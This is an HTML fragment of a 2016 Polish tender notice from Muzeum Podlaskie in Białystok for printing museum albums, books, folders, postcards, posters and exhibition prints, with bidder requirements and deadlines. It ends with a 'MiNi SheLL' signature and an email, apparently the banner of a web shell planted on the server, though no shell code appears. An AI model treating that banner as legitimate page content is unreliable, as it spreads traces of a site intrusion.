<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;">inne dokumenty</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony zgodnie z treścią i podpisany formularz Oferta wraz z załącznikiem nr 1 do oferty, stanowiący Załącznik Nr 1 do SIWZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Jakość - 30</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w zakresie: a) zmiany stawki podatku VAT, przy założeniu, że cena brutto ulegnie zmianie w stopniu wynikającym ze zmiany stawki podatkowej, zaś cena netto pozostanie bez zmian, b) zmiany przedstawicieli stron umowy, c) zmniejszenia zakresu wykonywanej usługi lub zmiana sposobu jej wykonania, d) jeżeli konieczność zmiany jest spowodowana wystąpieniem niezależnych od stron okoliczności, których nie można było przy dołożeniu należytej staranności przewidzieć w chwili zawarcia umowy, a które uniemożliwiają prawidłową realizację przedmiotu umowy zgodnie z jej postanowieniami, tj. działania siły wyższej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.muzeum.bialystok.pl/s,zamowienia-ktorych-wartosc-przekracza-kwote-30-tys-euro,375.html<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Muzeum Podlaskie w Białymstoku Ratusz - Rynek Kościuszki 10 15-426 Bialystok..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.04.2016 godzina 09:00, miejsce: Muzeum Podlaskie w Białymstoku Ratusz - Rynek Kościuszki 10 15-426 Bialystok..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Cześć wydruków w ramach realizacji projektu pn. Ośrodek edukacji ekologicznej Muzeum Podlaskiego - Sokolarnia współfinansowanego z Programu Operacyjnego pn.: Ochrona różnorodności biologicznej i ekosystemów w ramach Mechanizmu Finansowego Europejskiego Obszaru Gospodarczego 2009-2014.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część I zamówienia.  
Usługa poligraficzna: przygotowanie projektu, korekta tonalna fotografii, czyszczenie fotografii, adiustacja tekstu sprawdzenie pod względem językowym i gramatycznym, skład, druk albumów, książek i informatorów wraz z dostawą do siedziby Zamawiającego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Album
album Aleksander Szturman. Malarstwo. Kolekcja Muzeum Podlaskiego w Białymstoku, format 300 x 270 mm pion, środek obj. 60 str. +/- 10%, kreda silk. 170g, kolor 4+4, oprawa twarda szyta nićmi, tektura 2,5mm + oklejka 150g, kolor 4+0+folia matowa, wyklejka 170g offset, niezadrukowana, nakład 500 egz., wydawnictwo posiada Nr ISBN, 
Muzeum dostarczy gotowy projekt do 29 kwietnia 2016
Druk do 17 maja 2016. 


2.	Książka
książka: Podlaskie Zeszyty Archeologiczne 10/2014, format B5, obj. środek ok. 250 stron +/-10%, papier offset 90 g, kolor 4+4, oprawa miękka, klejona, okładka - karton 240 g. kolor 4+0 + folia błyszcząca, nakład 300 egz., wydawnictwo posiada Nr ISSN
Termin przekazania materiałów do przygotowania druku do 29.04.2016
Termin ukończenia druku - max. 2 miesiące od chwili otrzymania materiałów od Zamawiającego

3.	Książka
Ikonosfera, zeszyt 5, format B5 170 x 240 mm,  środek obj. 100 str., kreda mat. 135 g,  kolor 4+4, oprawa miękka, klejona, okładka karton z białym spodem 240 g, kolor 4+0+ lakier punktowo +folia matowa, nakład 350 egz. wydawnictwo posiada Nr ISSN
Termin przekazania materiałów do przygotowania druku do 4 lipca 2016 r., druk wydawnictwa  do 31 sierpnia 2016 r.

4.	Książka
Wielka Synagoga w Tykocinie, format B5, środek obj. ok. 40 str., kreda mat. 140g, kolor 4+4, oprawa twarda szyta nićmi, oklejka 130g, kolor 4+0+folia matowa, wyklejka niezadrukowana, nakład og. 1.000 egz. w tym 500 egz. wersja polskojęzyczna, 500 egz. wersja angielskojęzyczna, wydawnictwo posiada Nr ISBN,
Termin przekazania materiałów do przygotowania druku do końca kwietnia 2016, Druk wydawnictwa  do końca czerwca 2016

5.	Książka z E-publikacją
książka, format B5, środek obj. 320 str. +/- 10%, kreda mat. 130 g., kolor 4+4, oprawa twarda szyta nićmi, oklejka 130g, kolor 4+0+folia matowa, wyklejka niezadrukowana, nakład 1.000 egz., wydawnictwo angielskojęzyczne;
e-publikacja: nadruk offsetowy CMYK 4+0 + lakierowanie UV wraz z tłoczeniem płyt, nośnik dvd-5, etui foliowe wklejone na wewnętrzną część okładki książki format PDF, w języku polskim, zabezpieczenie przed swobodnym edytowaniem tekstu
wydawnictwo posiada numer ISBN
Termin przekazania materiałów do przygotowania druku do 1 czerwca 2016, druk wydawnictwa  do 10 sierpnia 2016

Wydruk w ramach realizacji projektu pn. Ośrodek edukacji ekologicznej Muzeum Podlaskiego - Sokolarnia współfinansowanego z Programu Operacyjnego pn.: Ochrona różnorodności biologicznej i ekosystemów w ramach Mechanizmu Finansowego Europejskiego Obszaru Gospodarczego 2009-2014

6.	Książka
książka Ptaki drapieżne w kulturze, format B5, środek obj. 128 str. +/- 10%, kreda 130g, kolor 4+4, oprawa twarda szyta nićmi, oklejka 130g, kolor 4+0+folia błyszcząca, wyklejka niezadrukowana, nakład 500 egz., wydawnictwo posiada numer ISBN  
Termin przekazania materiałów do przygotowania druku do 1 czerwca 2016, druk wydawnictwa  do 10 sierpnia 2016

Wydruk w ramach realizacji projektu pn. Ośrodek edukacji ekologicznej Muzeum Podlaskiego - Sokolarnia współfinansowanego z Programu Operacyjnego pn.: Ochrona różnorodności biologicznej i ekosystemów w ramach Mechanizmu Finansowego Europejskiego Obszaru Gospodarczego 2009-2014

7.	Informator
informator do wystawy Bielski ręcznik ludowy, format B5 poziom, środek: 36 stron, kreda mat. 150g, kolor 4+4, okładka kreda 300 g, kolor 4+0, lakier offsetowy, szycie zeszytowe, nakład 1000 egz. wydawnictwo posiada Nr ISBN
Termin przekazania materiałów do przygotowania druku do 1 czerwca 2016, druk wydawnictwa  do 30 czerwca 2016


8.	Informator
wzornik haftu i koronki Koronka, format B5 poziom, środek: 36 stron, kreda mat. 150g, kolor 4+4, okładka kreda 300 g, kolor 4+0, lakier offsetowy, szycie zeszytowe, nakład 1000 egz. Muzeum dostarczy gotowy projekt
Termin przekazania materiałów do przygotowania druku do 2 listopada 2016, druk wydawnictwa  do 30 listopada 2016

9.	Informator
informator wystawy Tajemniczy ręcznik, format A5 poziom, środek 16 stron, kreda mat. 135 g.,  kolor 4+4, okładka kreda 300g, kolor 4+0+lakier offsetowy, szycie zeszytowe,  nakład: 1000 egz., wydawnictwo posiada Nr ISBN,  Muzeum dostarczy gotowy projekt
Druk wydawnictwa maj 2016r. 

10.	Informator
Reprint informatora hotelu Ritz z 1935 r., wym. 17,0 x 10,7 cm pion, środek 32 strony, papier offsetowy 80 g, w kolorze kremowym, kolor 1+1, oprawa miękka, papier offsetowy  80 g  w kolorze różowym, kolor 1+1, szycie zeszytowe,  nakład - 100 egz.
Termin przekazania materiałów do przygotowania druku do 29 kwietnia 2016, druk wydawnictwa  do 13 maja 2016

11.	Informator
informator Wielka Synagoga w Białymstoku, format A5, środek 20 stron, kreda matowa 150 g, kolor 4+4, oprawa miękka, kreda matowa 300 g, kolor 4 + 4 + folia matowa, szycie zeszytowe, nakład 5000 egz. (wydawnictwo w wersji polsko-angielskiej), posiada Nr ISBN
Termin przekazania materiałów do przygotowania druku do 15 maja 2016, druk wydawnictwa  do 15 czerwca 2016

12.	Informator
informator Przewodnik po Muzeum Wnętrz Pałacowych w Choroszczy - 3 wydanie, 
format A4 składany na 3 (na Z), 2 bigi, karton 250 g, kolor 4+4+folia matowa, obustronnie,  2 wszywki w bigowaniach: 16 str. każda, format 1/3 A4,  kreda mat. 150 g, kolor 4+4, nakład 2000 egz., wydawnictwo posiada Nr ISBN
Muzeum dostarczy gotowy projekt, w którym należy dokonać wymiany 8 fotografii oraz fragmentu tekstu. 
Termin druku informatora maj 2016

13.	Katalog
Katalog, Aleksander Kozyrski -Malarstwo, format: 220 x220 mm , środek obj. 24 str., kreda mat. 150g, kolor 4+4, oprawa miękka, kreda 300g, kolor 4+0+folia matowa, szycie zeszytowe, nakład 300 egz. wydawnictwo dwujęzyczne polsko- angielskie katalog posiada Nr ISBN
Termin przekazania materiałów do przygotowania druku do 10 lipca 2016, druk wydawnictwa  do 30 sierpnia 2016

14.	Zeszyt edukacyjny
Zeszyt edukacyjny do projektu Różnorodność sztuk - sztuka różnorodności
format A4, środek 20 stron, papier offset 120 g, kolor 4+4, szycie zeszytowe, okładka karton 200 g., kolor 4+0+folia błyszcząca, nakład 1.000 szt. Muzeum dostarczy gotowy projekt. 
Termin przekazania materiałów do przygotowania druku do 01 czerwca 2016, druk wydawnictwa  do 20 czerwca 2016.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.80.00.00-2, 22.00.00.00-0, 79.82.00.00-8, 79.82.30.00-9, 22.12.00.00-7, 22.16.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Jakość - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część II zamówienia.  
Usługa poligraficzna: przygotowanie projektu, korekta tonalna fotografii, czyszczenie fotografii, skład, druk folderów, składanek, zaproszeń, pocztówek/reprodukcji, ulotek, wizytówek, plakatów/afiszy wraz z dostawą do siedziby Zamawiającego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Foldery składanki


1.	folder Muzeum Podlaskie w Białymstoku, format 400x210 mm, składane na cztery 3 bigi, kreda mat. 250 g, kolor 4+4+lakier offsetowy, nakład 5.000 szt. w tym: (3000 szt. wersja polskojęzyczna, 2000 szt. wersja angielskojęzyczna
Termin przekazania materiałów do przygotowania druku do końca kwietnia 2016, druk wydawnictwa  do końca maja 2016

2.	folder Święty Jan Paweł II w oczach dziecka, format 29,6 x 58,6 cm składany na 4, 3 bigowania, kreda mat. 200 g, kolor 4 + 4+lakier offsetowy, nakład 500 egz.   
Termin przekazania materiałów do przygotowania druku do 07 października 2016, druk wydawnictwa  do 15 października 2016

3.	folder do projektu Różnorodność sztuk - sztuka różnorodności, format A4 składany na 3 dwa bigi, kreda mat. 200 g, kolor 4+4+lakier offsetowy, nakład  500 szt. 
Termin przekazania materiałów do przygotowania druku do 1 czerwca 2016, druk wydawnictwa  do 20 czerwca 2016

4.	Folder, format A4 składany na 3, 2 bigi, kreda 250 g, kolor 4+4+lakier punktowo +folia mat., nakład og. 2.000 szt. w tym: 1000 szt. w języku polskim, 1000 szt. w języku angielskim
Termin przekazania materiałów do przygotowania druku do 15 maja 2016, druk wydawnictwa  do 09 czerwca 2016
Wydruk w ramach realizacji projektu pn. Ośrodek edukacji ekologicznej Muzeum Podlaskiego - Sokolarnia współfinansowanego z Programu Operacyjnego pn.: Ochrona różnorodności biologicznej i ekosystemów w ramach Mechanizmu Finansowego Europejskiego Obszaru Gospodarczego 2009-2014

Zaproszenia

1.	zaproszenie, format A4 składane na 3, 2 bigi, papier offset 200g, kolor 4+0, nakład 2.000 szt. Muzeum dostarczy gotowy projekt.
Druk wydawnictwa maj 2016r. 

2.	zaproszenie, format A5, kreda mat. 300 g, kolor 4+4+lakier offsetowy, nakład 300 szt.
Planowany termin realizacji przygotowania do druku - lipiec,  druk sierpień 2016.

3.	zaproszenie, A5 składane do A6 pion, kreda mat. 250 g, kolor 4+4+ folia mat., nakład 200 szt.
Termin przekazania materiałów do przygotowania druku do 31 maja 2016, druk wydawnictwa  do 09 czerwca 2016
Wydruk w ramach realizacji projektu pn. Ośrodek edukacji ekologicznej Muzeum Podlaskiego - Sokolarnia współfinansowanego z Programu Operacyjnego pn.: Ochrona różnorodności biologicznej i ekosystemów w ramach Mechanizmu Finansowego Europejskiego Obszaru Gospodarczego 2009-2014

Pocztówki/reprodukcje

1.	pocztówka, format A5, biały karton 250g, kolor 4+1+lakier offsetowy, nakład 500 szt.
Termin realizacji grudzień 2016, materiały do druku przekazane będą przez zamawiającego najpóźniej na 2 tyg. przed planowanym drukiem

2.	pocztówka, format A6, biały karton 250 g, kolor 4+1+lakier offsetowy, nakład 2wzory x 500 szt.
Termin realizacji maj 2016r. materiały do druku przekazane będą przez zamawiającego najpóźniej na 2 tyg. przed planowanym drukiem

3.	pocztówka, format A6, biały karton 250 g, kolor 4+1+lakier offsetowy, nakład 5 wzorów x 500 szt.
Termin realizacji do 15.06.2016r. materiały do druku przekazane będą przez zamawiającego najpóźniej na 2 tyg. przed planowanym drukiem

4.	pocztówka, format A6, biały karton 250 g, kolor 4+1+folia mat., nakład 2 x 1.000 szt. 
Termin realizacji do 15.05.2016r. materiały do druku przekazane będą przez zamawiającego najpóźniej na 2 tyg. przed planowanym drukiem

5.	pocztówka - ulotka, format A6, kreda mat. 350 g, kolor 4+4+folia mat., nakład 1.000 szt. 
Termin realizacji do 15.05.2016r. materiały do druku przekazane będą przez zamawiającego najpóźniej na 2 tyg. przed planowanym drukiem

6.	Reprodukcja ikony, format A5, kreda 350g, kolor 4 + 1+lakier offsetowy, nakład 500 szt. Muzeum dostarczy gotowy projekt
Termin realizacji do 06.05.2016r. materiały do druku przekazane będą przez zamawiającego najpóźniej na 2 tyg. przed planowanym drukiem

7.	reprodukcja ikon, format A4, papier samoprzylepny mat. 80 g, sztancowany (po 6 wizerunków na stronie), kolor 4+0; 4 rodzaje reprodukcji po 25 szt. - razem 100 sztuk.   
Termin realizacji do 29.04.2016r. materiały do druku przekazane będą przez zamawiającego najpóźniej na 2 tyg. przed planowanym drukiem

8.	komplet pocztówek w obwolucie, 10 pocztówek - format A5, kreda mat. 350 g, kolor 4+1+folia mat., obwoluta - format 3xA5, 4 bigi, kreda mat. 350 g, kolor 4+1+folia mat., nakład 2 x 500 kompletów tekst na pocztówkach i obwolucie dwujęzyczny pol. - ang.
Termin realizacji do 31.05.2016r. materiały do druku przekazane będą przez zamawiającego najpóźniej na 2 tyg. przed planowanym drukiem

9.	komplet pocztówek w obwolucie, 10 pocztówek - format A5, kreda mat. 350 g, kolor 4+1+folia mat., obwoluta - format 3xA5, 4 bigi, kreda mat. 350 g, kolor 4+1+folia mat., nakład 500 kompletów tekst na pocztówkach i obwolucie dwujęzyczny pol. - ang.
Termin realizacji do 31.08.2016r. materiały do druku przekazane będą przez zamawiającego najpóźniej na 2 tyg. przed planowanym drukiem

10.	pocztówka, format 15 x 10,5 cm, kreda mat. 250 g, kolor 1+0+lakier offsetowy, nakład 5000 szt. Muzeum dostarcza gotowy projekt.
Termin realizacji do 15.06.2016r. 

Ulotki

1.	Ulotka, format A4, kreda mat. 150 g., kolor 4+4, nakład 2000 szt.
Termin przekazania gotowych projektów - 21.10.2016r., termin druku 04.11.2016r.

2.	Ulotka - zawieszka z otworem śr. ok. 5 mm do zawieszenia na haczyku, format 8 x 6 cm, kreda 250g, kolor 4+4+lakier offsetowy, nakład 1.000 szt.
Termin przekazania gotowych projektów - 30.04.2016r., termin druku 31.05.2016r.

3.	Ulotka, format A6, kreda140 g, kolor 4+4, nakład: 3 wzory x 250 szt. 3 zamówienia
Termin realizacji zamówienia maj - sierpień 2016r. 

Wizytówki

1.	Wizytówka - 5x9 cm, papier ecrue 250g, kolor 2+0, 4 wzorów, nakład 4300 szt. Zamawiający dostarczy gotowy projekt do druku

Plakaty/afisze

1.	Afisz, format B1, papier offset, kolor 4+0, nakład 300 sztuk
Termin druku początek czerwca 2016r. materiały do druku przekazane będą przez zamawiającego najpóźniej na 2 tyg. przed planowanym drukiem

2.	Afisz, format B2, papier offset, kolor 4+0, nakład 300 sztuk
Termin druku połowa sierpnia 2016r. materiały do druku przekazane będą przez zamawiającego najpóźniej na 2 tyg. przed planowanym drukiem

3.	Plakat, format A2 wymiar 594 x 420 mm , kreda mat. 170 g, kolor 4+0, nakład 100 szt.,
Termin przekazani materiałów do druku 21.10.2016r., termin druku 04.11.2016r.

4.	Plakat, format 100cm x 30 cm poziom), papier posterowy blueback, kolor 4+0, nakład 100 szt. 
Termin realizacji do 15 maja 2016r. materiały do druku przekazane będą przez zamawiającego najpóźniej na 2 tyg. przed planowanym drukiem

5.	Plakaty do projektu edukacyjnego, format 100cm x 30 cm poziom), papier posterowy blueback, kolor 4+0, nakład 150 szt. Muzeum dostarczy gotowy projekt.
Termin przekazania materiałów do druku 01.06.2016r., termin druku do 09.06.2016r. 
Wydruk w ramach realizacji projektu pn. Ośrodek edukacji ekologicznej Muzeum Podlaskiego - Sokolarnia współfinansowanego z Programu Operacyjnego pn.: Ochrona różnorodności biologicznej i ekosystemów w ramach Mechanizmu Finansowego Europejskiego Obszaru Gospodarczego 2009-2014

6.	Plakat, format 100x30cm, poziom, papier posterowy blueback, kolor 4+0, nakład 60 szt. Termin przekazania materiałów do druku 31.05.2016r. , termin druku do 09.06.2016r. materiały do druku przekazane będą przez zamawiającego najpóźniej na 2 tyg. przed planowanym drukiem
Wydruk w ramach realizacji projektu pn. Ośrodek edukacji ekologicznej Muzeum Podlaskiego - Sokolarnia współfinansowanego z Programu Operacyjnego pn.: Ochrona różnorodności biologicznej i ekosystemów w ramach Mechanizmu Finansowego Europejskiego Obszaru Gospodarczego 2009-2014

7.	Plakat, format A1, kreda, 180 g, kolor 4+0, nakład 3 wzory x 200 szt.3 zamówienia
Termin realizacji kwiecień - sierpień 2016r.

8.	Plakat, format A1, kreda, 180 g, kolor 4+0, nakład 150 szt. 
Termin przekazania materiałów do druku 31.05.2016r., termin druku 09.06.2016r. 
Wydruk w ramach realizacji projektu pn. Ośrodek edukacji ekologicznej Muzeum Podlaskiego - Sokolarnia współfinansowanego z Programu Operacyjnego pn.: Ochrona różnorodności biologicznej i ekosystemów w ramach Mechanizmu Finansowego Europejskiego Obszaru Gospodarczego 2009-2014

KALENDARZ

Kalendarz do projektu Sokolarnia, wym. dł. 32 wys. 47 cm, razem 15 stron łączonych spiralą u góry, w tym: strona tytułowa: kreda 250 g, kolor 4+0; strony 2-13: kreda błysk, 180g, kolor 4+0, z przesuwanym na przeźroczystym pasku foliowym oknem w kol. czerwonym, ostatnie 2 strony (14 i 15): karton biały 250g, kolor 4+1+jednostronnie lakierowane mat, z perforowaniem dzielącym każdą kartę na 12 pól pocztówkowych o wym. 14,5 x 10,5 cm, umożliwiającym odrywanie poszczególnych pocztówek; nakład: 500 szt.,
Termin przekazania materiałów do druku 15.05.2016r. , termin druku 15.06.2016r. 
Wydruk w ramach realizacji projektu pn. Ośrodek edukacji ekologicznej Muzeum Podlaskiego - Sokolarnia współfinansowanego z Programu Operacyjnego pn.: Ochrona różnorodności biologicznej i ekosystemów w ramach Mechanizmu Finansowego Europejskiego Obszaru Gospodarczego 2009-2014.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.80.00.00-2, 22.00.00.00-0, 79.82.00.00-8, 79.82.30.00-9, 22.12.00.00-7, 22.16.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Jakość - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część III zamówienia  
Usługa poligraficzna: przygotowanie projektu, korekta tonalna fotografii, czyszczenie fotografii, skład, druk materiałów do aranżacji wystaw wraz z dostawą do siedziby Zamawiającego ..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Druk na płótnie Canvas - płótno matowe 400 g. ultra white, kolor 4 + 0  jedno zamówienie  - 44 m2     
2.	Druk na winylu -200 m2
3.	Druk na papierze posterowym - 200 m2
4.	Druk na folii samoprzylepnej podklejanej na spienione PCV 5 mm - 70 m2

Szczegóły dotyczące wykończenia tj. np. zgrzewanie, oczkowanie, klejenie itp. zostaną określone każdorazowo przy zamówieniu. 

Poszczególne zamówienia  z poz. 2 - 3  będą realizowane od kilku do kilkunastu m2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.80.00.00-2, 22.00.00.00-0, 79.82.00.00-8, 79.82.30.00-9, 22.12.00.00-7, 22.16.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Jakość - 30</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com